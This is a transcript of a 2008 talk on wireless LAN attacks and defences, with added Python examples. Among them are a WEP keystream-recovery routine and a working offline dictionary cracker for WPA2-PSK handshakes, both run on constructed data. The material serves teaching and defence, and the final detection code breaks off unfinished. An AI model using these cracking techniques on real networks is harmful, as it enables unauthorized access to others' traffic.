
How I Hacked Your Wireless LAN – And How to Stop Me

Date post: 05-Dec-2014
Description:
Wireless LANs are popping up everywhere – in homes, hotspots and businesses. Get a first-hand look at wireless LAN attacks that have occurred, an appraisal of various risk models that address real dangers (not just hype) and a vendor-neutral review of wireless security technologies on the market.
Transcript
Page 1: How I Hacked Your Wireless LAN – And How to Stop Me

How I Hacked Your Wireless LAN (And how to stop me...)

JON GREEN, CISSP

“How I Hacked Your Wireless LAN – And How to Stop Me”

Session A3, April 27 2008

Disclaimer
• I might be smart enough to hack your wireless LAN, but I don’t have time. I work for Aruba and have a 2-year-old child to chase around. Don’t blame me.

Page 2

Is This How You Think About Wireless?

The truth: wireless is MORE secure than wired (if you do it right)

Wired Network Security Questions

On your wired network...
• Do you authenticate all users and devices?
• Do you encrypt all traffic?
• Do you control access to network resources based on user identity?
• Wireless lets you do all of this – by design

Page 3

802.11 Technology and Vulnerabilities

(Timeline figure, 1999–2009, with a technology track and a vulnerability track; items are listed in the order they appear along the axis)

Technology:
• 802.11a and 802.11b PHY/MAC; EAP-TLS, EAP-MD5, LEAP
• 802.11g, Europe 5 GHz, Japan 5 GHz, WPA; PEAP, TTLS, EAP-FAST
• 802.11i, WPA2, QoS
• Radio resource management, fast roaming, early mesh deployments; regulatory domain extensions
• Management frame protection; MIMO, WAVE, mesh, external internetwork
• Performance, network management, 3.65 GHz

Vulnerabilities and attack tools:
• Early wardriving, early WEP attacks
• Windows wardriving tools, growing attack tool sophistication
• Hotspot impersonation, LEAP exposed
• Sophisticated WEP attack tools, attacks against WPA-PSK, PHY jamming tools
• Hotspot manipulation, QoS attacks, WIDS fingerprinting
• Commodity WIDS evasion, client attacks; Metasploit for wireless, critical client driver vulnerabilities, client attacks gaining popularity, fuzzing
• Still open questions at the time of the talk: AP fuzzing? RADIUS fuzzing? 802.11 VA tools? Attacks against TKIP?

Publicized incidents on the same axis: Lowe’s, TJX, Best Buy, Houston Court System, BJ’s, GE Money, PG&E

How NOT to Deploy Wireless!

Page 4

Doing Nothing

• Wireless LAN equipment is cheap and easily available
• If the IT department doesn’t deploy wireless, someone else will
• Where is the “security perimeter” today?
• How do you enforce “No Wireless” policies?

What if we ignore wireless?

(Diagram: your company, your employee, and a public Wi-Fi hotspot in New York City)
• Employee is a subscriber to a public Wi-Fi hotspot service
• Employee’s laptop automatically associates with the public Wi-Fi hotspot
• Employee plugs into the wired corporate network
• Traffic is bridged between the public hotspot and the enterprise network

Page 5

RF Engineering

• Using directional antennas to direct and limit RF coverage does not work
• RF is invisible
• Physical environments change
• Lowering transmit power or placing access points (APs) away from outside walls to limit RF “leakage” does not work – an attacker with a high-gain antenna hears a weak signal from well outside the area you intended to cover
• Set RF coverage to optimize user experience – not to control leakage

SSID Cloaking

• Some APs offer a feature to hide the SSID (Service Set Identifier or “wireless network name”) in advertisements
• Hiding the SSID can discourage but cannot secure
• A person intent on network intrusion can run a simple tool to instantly reveal the SSID
• The SSID should never be treated as though it were a password

Page 6

Discovering Cloaked SSIDs

linux:~# ./essid_jack -h
Essid Jack: Proof of concept so people will stop calling an ssid a password.

Usage: ./essid_jack -b <bssid> [ -d <destination mac> ] [ -c <channel number> ] [ -i <interface name> ]

-b: bssid, the mac address of the access point (e.g. 00:de:ad:be:ef:00)
-d: destination mac address, defaults to broadcast address.
-c: channel number (1-14) that the access point is on, defaults to current.
-i: the name of the AirJack interface to use (defaults to aj0).

linux:~# essid_jack -b 00:03:2d:de:ad: -c 11
Got it, the essid is (escape characters are c style):
“s3kr1t_wl4n"

(The tool sends a deauthentication to the client; when the client reassociates, the SSID is carried in the clear in its probe request and the AP’s probe response.)

MAC Address Filtering

• Some APs offer “MAC address filtering”
• Does not scale to large networks
• Trivial to defeat – MAC addresses are transmitted unencrypted in every frame, and any wireless client can be configured to use the address of a station that is already allowed

Page 7

WEP

• WEP stands for “Wired Equivalent Privacy”
• Badly broken

Static versus Dynamic WEP
• Static WEP: everyone uses the same key, all the time
• Dynamic WEP: everyone uses a different key, assigned at each authentication
• Static WEP is evil. Avoid it.
• Dynamic WEP is slightly better, but it is still WEP

Attacking WEP - Aircrack
• Goal: Capture frames with weak IVs (Initialization Vectors)
• Need 50K-200K frames for a 64-bit key, 200K-700K for a 128-bit key (the “64-bit” and “128-bit” names include the 24-bit IV that is sent in the clear; the secret part is only 40 or 104 bits)

Page 8

Attacking WEP – Speeding things up
• Use “void11” to deauthenticate clients from the WLAN, then let them reassociate – this generates valid data traffic
• But this interferes with normal WLAN operation – people will notice
• Use “Aireplay”: capture a valid ARP packet, replay it to the WLAN over and over, and let the AP generate lots of frames (every reply carries a fresh IV, and ARP frames are recognizable by their fixed size even when encrypted)
• Result: 64-bit keys cracked in ~5 minutes; 128-bit keys cracked in ~10 minutes
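The two WEP slides above describe what aircrack and aireplay exploit without showing the mechanics. The block below is an added example, not code from the talk and not aircrack itself: a plain RC4 and a WEP frame body are implemented so the three properties can be seen on constructed data. The 40-bit secret, the IVs and the frames are all invented here; what is not invented is that every frame’s RC4 key is IV || secret, that the IV travels in the clear, that ARP and IP frames begin with a fixed LLC/SNAP header, and that the original FMS “weak” IVs have the shape (B+3, 0xFF, x).

```python
"""WEP weaknesses behind aircrack/aireplay, on constructed frames. Added example, not the talk's code."""
import struct
import zlib


def rc4(key, n):
    """RC4 keystream of n bytes (KSA then PRGA). Plain RC4, no WEP-specific tricks."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, plaintext):
    """WEP frame body: IV(3) | key-id(1) | RC4(IV || secret) XOR (plaintext || CRC-32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    keystream = rc4(iv + secret, len(plaintext) + 4)
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(plaintext + icv, keystream))


# Every 802.11 data frame carrying ARP (0x0806) or IP (0x0800) starts with this LLC/SNAP header,
# so the first 8 plaintext bytes of almost any frame are known before any key is.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def recover_keystream(body, known_plaintext):
    """Known plaintext XOR ciphertext = the keystream this IV produced. Returns (iv, keystream)."""
    iv, ct = body[:3], body[4:4 + len(known_plaintext)]
    return iv, bytes(a ^ b for a, b in zip(ct, known_plaintext))


def decrypt_with_keystream(body, keystream):
    """Any other frame that reuses the same IV (2^24 IVs, so reuse is inevitable) is readable."""
    return bytes(a ^ b for a, b in zip(body[4:4 + len(keystream)], keystream))


def is_fms_weak_iv(iv, key_byte):
    """Original FMS 'resolved' IV shape (B+3, 0xFF, x): such a frame leaks secret key byte B.
    aircrack also uses later KoreK/PTW classes; this is the class the slide's numbers come from."""
    return iv[0] == key_byte + 3 and iv[1] == 0xFF


def count_weak_ivs(bodies, secret_len):
    return sum(1 for b in bodies if any(is_fms_weak_iv(b[:3], k) for k in range(secret_len)))


def demo():
    secret = bytes.fromhex("0102030405")            # constructed 40-bit secret ("64-bit WEP")
    iv = b"\x03\xff\x07"                            # weak shape for key byte 0
    arp_frame = wep_encrypt(secret, iv, LLC_SNAP_ARP + bytes(20))   # what aireplay captures
    ip_frame = wep_encrypt(secret, iv, LLC_SNAP_IP + bytes(40))     # a later frame, same IV
    _, keystream = recover_keystream(arp_frame, LLC_SNAP_ARP)
    # Eight replayed ARP replies: four land on weak IVs, four do not.
    ivs = [bytes([3, 0xFF, x]) for x in range(4)] + [bytes([9, 9, x]) for x in range(4)]
    bodies = [wep_encrypt(secret, v, LLC_SNAP_ARP) for v in ivs]
    return {
        "keystream_matches": keystream == rc4(iv + secret, 8),
        "decrypted_prefix": decrypt_with_keystream(ip_frame, keystream),
        "weak_ivs": count_weak_ivs(bodies, len(secret)),
    }
```

The point of `recover_keystream` is that no key is needed: eight bytes of keystream per IV fall out of the LLC/SNAP header alone, which is also why the replayed ARP frames aireplay injects do not have to be decrypted first. Recovering the secret itself takes the statistical step over many weak IVs that `count_weak_ivs` only tallies.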

Cisco LEAP

• Cisco invented LEAP to solve key distribution problems
• Vulnerable to dictionary attacks – the challenge/response is computed from the user’s password hash, so a captured exchange can be tested against a wordlist offline
• LEAP cracking tool is called ASLEAP
• Currently considered broken and unsuitable for use

Page 9

How to Stop Me

Let’s start here... AES-CCMP Block Diagram

(Diagram: the header is not encrypted but is covered by the integrity check; the message blocks B0, B1 ... Bk (padded) are chained through AES (E) in CBC-MAC mode to produce the tag; the counter blocks A0, A1 ... Am are encrypted to give keystream blocks S0, S1 ... Sm, which are XORed with the message and the tag)

Page 10

A Layered Approach to Wireless Security

• PROTECTING THE AIR: RF spectrum security, wireless IDS
• PROTECTING THE NETWORK: strong authentication
• PROTECTING THE CONNECTION: per-packet authentication, centralized encryption
• PROTECTING THE USER: stateful per-user firewalls
• PROTECTING THE DATA: WPA2 and AES
• Enterprise assets at the center of the layers

Centralization is the First Step

• Centralization solves security and TCO for WLANs
• Centralized mobility controller: policy, mobility, forwarding, management
• “Thin” access points: 802.11a/b/g radios and antennas only
• “Fat” access points: each AP carries forwarding, encryption and authentication itself

Page 11

Controlling “Uncontrolled Wireless”

• AP detection
  • See all APs
• AP classification
  • Are they neighbors?
  • Or are they a threat?
• Rogue containment
  • Stop users from accessing rogue APs and leave neighbors alone

Wireless Intrusion Detection/Protection

Page 12

Authentication with 802.1x

• Authenticates users before granting access to L2 media
• Makes use of EAP (Extensible Authentication Protocol) – evolved from PPP
  • PEAP, EAP-TLS, EAP-TTLS, etc.
• 802.1x authentication happens at L2 – users will be authenticated before an IP address is assigned

Authentication with 802.1x

(Diagram: STA <-- EAPOL (EAP over LAN) --> AP/Controller <-- RADIUS --> Authentication Server; the EAP method itself runs inside an encrypted tunnel that reaches end to end from the station to the authentication server)
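The diagram shows the same EAP packet crossing two links: EAPOL from the station to the AP/controller, then RADIUS to the authentication server. The block below is an added example, not the talk’s code, that builds that first exchange byte for byte: an EAP Response/Identity wrapped in EAPOL, the same EAP packet re-wrapped in a RADIUS Access-Request with the Message-Authenticator that RFC 3579 requires whenever EAP-Message is present, and the server’s Access-Challenge with its Response Authenticator (RFC 2865). The identity, shared secret and authenticator bytes are constructed; a real AP uses a random Request Authenticator per packet.

```python
"""802.1X front end on the wire: EAP in EAPOL, then EAP in RADIUS. Added example, not the talk's code."""
import hashlib
import hmac
import struct

EAP_REQUEST, EAP_RESPONSE, EAP_TYPE_IDENTITY = 1, 2, 1
RADIUS_ACCESS_REQUEST, RADIUS_ACCESS_CHALLENGE = 1, 11
USER_NAME, EAP_MESSAGE, MESSAGE_AUTHENTICATOR = 1, 79, 80


def eap_response_identity(eap_id, identity):
    """EAP packet: code(1) id(1) length(2) type(1) type-data."""
    body = bytes([EAP_TYPE_IDENTITY]) + identity.encode()
    return struct.pack(">BBH", EAP_RESPONSE, eap_id, 4 + len(body)) + body


def eapol_frame(eap_packet):
    """EAPOL header: protocol version 2, packet type 0 (EAP-Packet), body length. This is all the
    station can send before it has an IP address; the AP relays it, it does not interpret it."""
    return struct.pack(">BBH", 2, 0, len(eap_packet)) + eap_packet


def radius_attr(attr_type, value):
    """RADIUS attribute TLV; the length byte includes the 2-byte header, so values max out at 253."""
    if len(value) > 253:
        raise ValueError("value too long: large EAP packets are split across several EAP-Message attrs")
    return struct.pack(">BB", attr_type, len(value) + 2) + value


def access_request(ident, request_auth, secret, username, eap_packet):
    """Access-Request carrying EAP-Message. Message-Authenticator = HMAC-MD5(secret) over the whole
    packet with that attribute's 16 value bytes zeroed (RFC 3579 3.2)."""
    attrs = radius_attr(USER_NAME, username.encode()) + radius_attr(EAP_MESSAGE, eap_packet)
    zeroed = attrs + radius_attr(MESSAGE_AUTHENTICATOR, bytes(16))
    header = struct.pack(">BBH", RADIUS_ACCESS_REQUEST, ident, 20 + len(zeroed)) + request_auth
    mac = hmac.new(secret, header + zeroed, hashlib.md5).digest()
    return header + attrs + radius_attr(MESSAGE_AUTHENTICATOR, mac)


def parse_attrs(pkt):
    """Walk attributes from offset 20 with bounds checks. Yields (type, value offset, value)."""
    out, i = [], 20
    while i < len(pkt):
        if i + 2 > len(pkt) or pkt[i + 1] < 2 or i + pkt[i + 1] > len(pkt):
            raise ValueError("malformed attribute at offset %d" % i)
        out.append((pkt[i], i + 2, pkt[i + 2:i + pkt[i + 1]]))
        i += pkt[i + 1]
    return out


def verify_message_authenticator(pkt, secret, request_auth=None):
    """Server side for a request (authenticator taken from the packet) or AP side for a reply
    (authenticator is the one from the matching request). A bad HMAC means wrong secret or tampering."""
    auth = pkt[4:20] if request_auth is None else request_auth
    for attr_type, off, value in parse_attrs(pkt):
        if attr_type == MESSAGE_AUTHENTICATOR and len(value) == 16:
            zeroed = pkt[:4] + auth + pkt[20:off] + bytes(16) + pkt[off + 16:]
            return hmac.compare_digest(hmac.new(secret, zeroed, hashlib.md5).digest(), value)
    return False


def access_challenge(ident, request_auth, secret, eap_packet):
    """Server reply carrying the next EAP Request. Response Authenticator =
    MD5(code | id | length | RequestAuth | attributes | secret), RFC 2865 3."""
    attrs = radius_attr(EAP_MESSAGE, eap_packet)
    header = struct.pack(">BBH", RADIUS_ACCESS_CHALLENGE, ident, 20 + len(attrs) + 18)
    mac = hmac.new(secret, header + request_auth + attrs + radius_attr(MESSAGE_AUTHENTICATOR, bytes(16)),
                   hashlib.md5).digest()
    attrs += radius_attr(MESSAGE_AUTHENTICATOR, mac)
    response_auth = hashlib.md5(header + request_auth + attrs + secret).digest()
    return header + response_auth + attrs


def verify_response(resp, request_auth, secret):
    """AP/controller check that a reply belongs to its own request and came from a holder of the secret."""
    code, ident, length = struct.unpack(">BBH", resp[:4])
    expected = hashlib.md5(resp[:4] + request_auth + resp[20:] + secret).digest()
    return length == len(resp) and hmac.compare_digest(expected, resp[4:20])


def demo():
    secret, request_auth = b"s3cr3t-shared", bytes(range(16))     # constructed; use random bytes in practice
    eap = eap_response_identity(1, "jgreen@corp.example")
    req = access_request(7, request_auth, secret, "jgreen@corp.example", eap)
    # Server starts the tunnelled method: EAP Request, id 2, type 25 (PEAP), flags 0x20 (start).
    chal = access_challenge(7, request_auth, secret, struct.pack(">BBHB", EAP_REQUEST, 2, 6, 25) + b"\x20")
    tampered = req.replace(b"jgreen", b"jsmith", 1)                 # same length, so only the HMAC breaks
    return {
        "eapol_len": len(eapol_frame(eap)),
        "request_ok": verify_message_authenticator(req, secret),
        "tampered_ok": verify_message_authenticator(tampered, secret),
        "wrong_secret_ok": verify_message_authenticator(req, b"guess"),
        "challenge_ok": verify_response(chal, request_auth, secret)
        and verify_message_authenticator(chal, secret, request_auth),
    }
```

Two things worth noticing against the slide: the shared secret between AP/controller and RADIUS server is the only thing protecting this hop, and MD5-based authenticators are why the RADIUS link should itself be on a trusted segment or tunnelled; and the EAP payload is opaque to both wrappers, which is what lets PEAP/TTLS carry an encrypted tunnel straight from the station to the authentication server.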

Page 13

802.1x Acronym Soup

• PEAP (Protected EAP)
  • Uses a digital certificate on the network side
  • Password or certificate on the client side
• EAP-TLS (EAP with Transport Layer Security)
  • Uses a certificate on the network side
  • Uses a certificate on the client side
• TTLS (Tunneled Transport Layer Security)
  • Uses a certificate on the network side
  • Password, token, or certificate on the client side
• EAP-FAST
  • Cisco proprietary
  • Do not use – known security weaknesses

Encrypt the Data

• If intruders can’t read the data, there’s no need to worry where it goes
• WEP
  • Encryption using RC4
  • Simple to do, easy to crack
  • No key management
  • Don’t do it
• TKIP (Temporal Key Integrity Protocol)
  • Encryption using RC4
  • Works on legacy hardware
  • No major weaknesses known (as of this talk, April 2008; practical attacks on TKIP were published later that year, so treat it as legacy-only today)
• CCMP/AES
  • Encryption using AES
  • Considered state-of-the-art
  • FIPS 140-2 approved
  • May require new hardware

Page 14

Combining Authentication & Encryption: WPA

• WPA == Wi-Fi Protected Access
• WPA
  • Wi-Fi Alliance “standard” based on pre-802.11i
  • Includes TKIP for encryption
• WPA2
  • Wi-Fi Alliance “standard” based on ratified 802.11i
  • Includes TKIP and CCMP for encryption
• For both:
  • WPA-Enterprise == 802.1x for authentication, dynamic encryption
  • WPA-Personal == pre-shared authentication key

Pre-Shared Key Authentication Cannot Scale

• WPA/WPA2 accommodates authentication using IEEE 802.1X or a pre-shared key
• PSK authentication is "WPA-Personal", 802.1X is "WPA-Enterprise"
• WPA-Personal is deployed without the complexity of IEEE 802.1X, no EAP type configuration
• Attractive to deploy, but insecure
• Like WEP, PSK authentication is weak and cannot scale
  • Subject to offline dictionary attacks – one captured 4-way handshake (easily forced with a deauthentication) lets an attacker test passphrases at leisure without ever talking to the AP again
  • A stolen/lost device with the PSK mandates rotation of all PSKs throughout the organization
  • How many people require knowledge of the key?
  • Is the key stored on laptops accessible to users?
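What “subject to offline dictionary attacks” means in practice, as an added example that is not code from the talk: the PMK of a WPA/WPA2-Personal network is nothing more than PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), and message 2 of the 4-way handshake carries a MIC computed with a key derived from that PMK and four public values (both MAC addresses, both nonces). Anyone who sniffed those values can test candidate passphrases offline. Only the standard’s derivations are used; the SSID, MAC addresses, nonces and wordlist are constructed, and the handshake frame is built here rather than captured (it is WPA2/CCMP style, key descriptor version 2, so the MIC is HMAC-SHA1-128).

```python
"""Offline dictionary attack on a WPA2-PSK 4-way handshake. Added example, not the talk's code."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512: HMAC-SHA1 blocks over 'Pairwise key expansion' || 0 || min/max(MACs) || min/max(nonces) || i.
    Layout of the result: KCK = [0:16] (MIC key), KEK = [16:32], TK = [32:48] (CCMP data key)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the 16-byte MIC


def build_msg2(snonce, mic=bytes(16), key_data=b""):
    """Handshake message 2 (supplicant -> AP) as an EAPOL-Key frame: descriptor type 2 (RSN),
    key info 0x010A = descriptor version 2, pairwise, MIC bit; key length 16; replay counter 1."""
    body = (struct.pack(">BHHQ", 2, 0x010A, 16, 1) + snonce + bytes(16) + bytes(8) + bytes(8)
            + mic + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 2, 3, len(body)) + body        # EAPOL version 2, type 3 (EAPOL-Key)


def eapol_mic(kck, eapol_frame):
    """Descriptor version 2: MIC = first 128 bits of HMAC-SHA1(KCK, frame with the MIC field zeroed)."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """One PBKDF2, one PRF and one HMAC per candidate; nothing is sent to the network."""
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return candidate
    return None


def demo():
    """Constructed capture: a weak passphrase on a guest SSID, and a short wordlist that contains it."""
    ssid, passphrase = "CORP-guest", "welcome1"
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # AP and station MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                 # from messages 1 and 2
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = build_msg2(snonce)
    msg2 = build_msg2(snonce, mic=eapol_mic(kck, msg2))     # what the real supplicant transmits
    wordlist = ["password", "letmein", "welcome1", "Summer2008"]
    return crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist)
```

The 4096 PBKDF2 iterations are the only thing slowing this loop down, and they are per SSID rather than per user, which is why precomputed tables for common SSIDs exist and why the slide’s points about key rotation and how many people know the key matter: the passphrase, not the handshake, is the whole secret.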

Page 15

Configure WPA Properly

• Configure the Common Name of your RADIUS server (matches the CN in the server certificate)
• Configure trusted CAs (an in-house CA is better than a public CA – with a public CA, anyone who can buy a certificate from it can stand up a server that your clients will trust unless the name is also checked)
• ALWAYS validate the server certificate
• Do not allow users to add new CAs or trust new servers
• Enforce with group policy
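Whether a client actually does what the slide says is visible in its supplicant configuration, so the settings can be audited rather than trusted. The block below is an added example, not code from the talk or from wpa_supplicant: a small parser for wpa_supplicant-style `network={...}` blocks and an audit that flags enterprise networks with no trusted CA, no server-name match, or a cleartext password, plus any WEP or WPA-PSK networks. The field names (`key_mgmt`, `ca_cert`, `subject_match`, `domain_suffix_match`, `wep_key0`, `psk`) are wpa_supplicant’s own; the configuration text, SSIDs and paths are constructed.

```python
"""Audit a wpa_supplicant-style config for the mistakes the slide warns about. Added example."""
import re

# Constructed configuration: one misconfigured enterprise profile, one correct one, a WEP and a PSK network.
SAMPLE_CONF = """
network={
    ssid="CORP"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jgreen"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="CORP-good"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-root-ca.pem"
    subject_match="/CN=radius.corp.example"
    identity="jgreen"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="legacy"
    key_mgmt=NONE
    wep_key0=0102030405
}
network={
    ssid="home"
    key_mgmt=WPA-PSK
    psk="correct horse battery staple"
}
"""

NETWORK_BLOCK = re.compile(r"network=\{(.*?)\}", re.S)


def parse_networks(text):
    """Parse each network={ key=value ... } block into a dict; comments and blank lines are skipped."""
    nets = []
    for block in NETWORK_BLOCK.finditer(text):
        fields = {}
        for line in block.group(1).splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip().strip('"')
        nets.append(fields)
    return nets


def audit(fields):
    """Findings for one network block, following the slide's checklist."""
    findings = []
    key_mgmt = fields.get("key_mgmt", "WPA-PSK WPA-EAP").split()    # wpa_supplicant's default
    if "NONE" in key_mgmt and any(k.startswith("wep_key") for k in fields):
        findings.append("WEP: static key on a broken cipher")
    if "WPA-PSK" in key_mgmt:
        findings.append("PSK: one shared secret; the 4-way handshake can be attacked offline")
    if "WPA-EAP" in key_mgmt:
        if "ca_cert" not in fields and "ca_path" not in fields:
            findings.append("EAP: no ca_cert, the server certificate is not validated (rogue RADIUS accepted)")
        if not any(k in fields for k in ("subject_match", "altsubject_match", "domain_suffix_match")):
            findings.append("EAP: no server-name match, any certificate from a trusted CA is accepted")
        if "password" in fields:
            findings.append("EAP: cleartext password stored in the config file")
    return findings


def audit_config(text):
    """SSID -> list of findings for every network in the file."""
    return {net.get("ssid", "?"): audit(net) for net in parse_networks(text)}
```

The first two EAP findings are the ones that matter for the slide: without `ca_cert` the supplicant accepts any server certificate, and without a name match it accepts any certificate the trusted CA ever issued. That is the gap a rogue AP with its own RADIUS server exploits to collect PEAP/MSCHAPv2 credentials.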

Captive Portals

• Browser-based authentication
• SSL encrypted
• Permits registered user or guest access
• No inherent link-layer encryption – only the login page is protected; everything after it crosses the air in the clear unless the application encrypts it
• Use with caution!

Page 16

Authorize the Data

• Most organizations do a decent job of authentication (who the user is), but a poor job of authorization (what the user is allowed to do)
• Mobile networks are typically multi-use
• Authentication provides you with user identity – now use it! Identity-aware firewall policies can restrict what a user can do, based on that user’s needs

(Diagram: an employee, a guest user, a VoIP device and a contractor all arrive through the same layer 2 switch, default VLAN and DHCP pool; Virtual AP 1 (SSID: CORP) authenticates employees against a RADIUS server, Virtual AP 2 (SSID: GUEST) sends guests through a captive portal; a router/firewall sits between the wireless users and the rest of the network)

Why Worry About Authorization?

Where is the “network perimeter” today?

Mobility brings us:
• Disappearance of physical security
• New mobile users, devices appearing every day
• Increased exposure to malware
• Ouch!

Assuming that “the bad guys are outside the firewall, the good guys are inside” is a recipe for disaster

Page 17

Today’s Wireless Gold Standard

• Centralized wireless
  • Keep clients updated – drivers too!
• Wireless intrusion detection
  • Control uncontrolled wireless
  • Locate and protect against rogue APs
• WPA2
  • Device authentication using 802.1x and PEAP
  • User authentication using 802.1x and PEAP
  • AES for link-layer encryption
• Strong passwords
  • SecurID or other token-card products
  • Strong password policies
• Authorization with identity-aware firewalls
  • Protect wireless users from other wireless users
  • Another layer of defense

What’s Left?

Page 18

Attacking Preferred Networks List (PNL)

• Multiple tools to abuse the preferred network list on clients
  • Hotspotter
  • RawGlueAP
  • KARMA
• When and how stations roam is still driver-implementation dependent
• Can be abused by attackers – a client that probes for the networks in its list tells anyone listening which SSIDs it will join

KARMA

• Listens for probes in monitor mode
• Becomes the AP for all probed networks
• Includes extensive support for fake services to manipulate client connectivity (XML)
  • Fake SMB, FTP, HTTP
• Bring Your Own eXploit (BYOX) model

“… a number of client-side exploits have been written, tested and demonstrated within this framework. Some may be included in a future release. Automated agent deployment is also planned.”

Page 19

KARMA Example

Windows XP PNL Weakness

• Empty PNL, XP still probes with uninitialized memory contents as the SSID
• Will associate to networks using this SSID, with no popup notification
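Both the essid_jack output on the “Discovering Cloaked SSIDs” page and the KARMA/PNL pages above come down to the same 802.11 management frames, so one added example serves both. It is not code from the talk, from essid_jack or from KARMA: a minimal builder and a bounds-checked parser for beacon, probe request and probe response frames (24-byte MAC header, fixed fields, then information elements), then two functions over a constructed capture. `reveal_cloaked_ssids` shows why cloaking fails: the beacon carries an empty SSID element, but the probe response the AP sends to a returning client carries the real name. `detect_karma` is the WIDS side of the PNL attack: one BSSID answering probe requests for several unrelated SSIDs is a rogue, not an AP. All MAC addresses, SSIDs and frames are constructed, and the parser’s length checks are the “over-the-air data is user input” rule from the client-driver page applied to a parser.

```python
"""802.11 management frames: cloaked-SSID recovery and KARMA detection. Added example, not the talk's code."""
import struct
from collections import defaultdict

# Frame-control byte 0 for the management subtypes handled here (type 00 = management).
BEACON, PROBE_REQ, PROBE_RESP = 0x80, 0x40, 0x50
IE_SSID = 0
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def build_mgmt(subtype, dst, src, bssid, ssid):
    """Constructed frame: 24-byte MAC header, fixed fields (beacon/probe response only), one SSID IE."""
    header = struct.pack("<BBH", subtype, 0, 0) + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00"
    fixed = b"" if subtype == PROBE_REQ else struct.pack("<QHH", 0, 100, 0x0411)  # timestamp, interval, capability
    return header + fixed + bytes([IE_SSID, len(ssid)]) + ssid.encode()


def parse_ies(buf):
    """Walk information elements with bounds checks. An IE length that overruns the frame is
    exactly what driver fuzzers send; a parser that trusts it reads past its buffer."""
    ies, i = {}, 0
    while i + 2 <= len(buf):
        eid, length = buf[i], buf[i + 1]
        if i + 2 + length > len(buf):
            raise ValueError("IE %d length %d overruns frame" % (eid, length))
        ies[eid] = buf[i + 2:i + 2 + length]
        i += 2 + length
    if i != len(buf):
        raise ValueError("trailing bytes after last IE")
    return ies


def parse_mgmt(frame):
    if len(frame) < 24:
        raise ValueError("short frame")
    subtype = frame[0]
    if subtype not in (BEACON, PROBE_REQ, PROBE_RESP):
        raise ValueError("unhandled subtype 0x%02x" % subtype)
    body = frame[24:] if subtype == PROBE_REQ else frame[36:]
    ies = parse_ies(body)
    return {"subtype": subtype, "src": frame[10:16], "bssid": frame[16:22], "ssid": ies.get(IE_SSID, b"")}


def is_malformed(frame):
    try:
        parse_mgmt(frame)
        return False
    except ValueError:
        return True


def reveal_cloaked_ssids(frames):
    """Beacons of a cloaked network carry an empty (or all-NUL) SSID; the probe responses the same
    BSSID sends to a (re)connecting client carry the real one. Returns bssid -> ssid."""
    parsed = [parse_mgmt(f) for f in frames]
    cloaked = {}
    for f in parsed:
        if f["subtype"] == BEACON and f["ssid"].strip(b"\x00") == b"":
            cloaked.setdefault(f["bssid"], None)
    for f in parsed:
        if f["subtype"] == PROBE_RESP and f["bssid"] in cloaked:
            cloaked[f["bssid"]] = f["ssid"].decode(errors="replace")
    return cloaked


def detect_karma(frames, threshold=3):
    """A single BSSID answering probes for several unrelated SSIDs is a KARMA-style rogue.
    Returns bssid -> sorted list of the SSIDs it claimed to be."""
    claimed = defaultdict(set)
    for f in (parse_mgmt(x) for x in frames):
        if f["subtype"] == PROBE_RESP:
            claimed[f["bssid"]].add(f["ssid"])
    return {b: sorted(s) for b, s in claimed.items() if len(s) >= threshold}


def sample_frames():
    """Constructed capture: a cloaked corporate AP, a returning client, and a KARMA rogue."""
    ap, client, rogue = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff", "de:ad:be:ef:00:01"
    frames = [build_mgmt(BEACON, BROADCAST, ap, ap, ""),
              build_mgmt(PROBE_REQ, BROADCAST, client, BROADCAST, "s3kr1t_wl4n"),
              build_mgmt(PROBE_RESP, client, ap, ap, "s3kr1t_wl4n")]
    for leaked in ("linksys", "attwifi", "CORP"):      # the client's preferred network list, on the air
        frames.append(build_mgmt(PROBE_REQ, BROADCAST, client, BROADCAST, leaked))
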